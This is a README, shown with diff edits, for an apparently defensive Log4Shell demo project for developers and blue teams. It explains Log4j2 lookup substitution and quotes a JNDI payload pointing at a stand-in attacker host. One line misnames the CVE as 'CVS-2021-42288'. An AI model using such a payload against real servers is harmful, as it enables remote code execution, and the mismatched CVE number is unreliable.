WISeAgent/log4j2/README.md

 **tl;dr**

 Log4Shell vulnerability in plain English:

 1. Vulnerable Web application trusts the user data which shouldn't be trusted, eg. this demo project

 2. Vulnerable Log4j2 is used by web app for logging

 3. The lookup() implementation from org.apache.logging.log4j.core package in the Vulnerable Log4j2 envluates variable ${key:value} in log message and substitute the variable with value.
 It opens the door and exposes the vulnerability.

-Once the door can be opened, all you need is your imagation/creativity to craft various of payloads and delivery methods to exploit this log4j2 vulnerability.
+Once the door is opened, all you need is your imagation/creativity to craft various of payloads and delivery methods to exploit this log4j2 vulnerability.

-CVS-2021-42288 use carefully brafted ${jndi:ldap://....} payout.
+The CVS-2021-42288 uses carefully brafted ${jndi:ldap://....} payout.

 Spring Boot is using logback by default.
 It is supporting the use of log4j2 and hance it's exposed to this vulnerability if Log4j2 is not patched.

 **Hacking is illegal!** It's not a good idea to encourage exploitation of this vulunerability.
 That being said, developer/blue team member should have better understanding on the "how" so to build a better and secured application.

 The purpose of this demo is for developer/blue team member to understand how older version of log4j2 is being exploitted and how to patch it.
 Instead of using ${jndi:ldap://attackerserver.com/RCE} as payload, we display the OS version instead in this demo.

 ## Create a New Maven Demo Project for Log4Shell(CVE-2021-44228)
 ### 1. Create an empty project using Spring CLI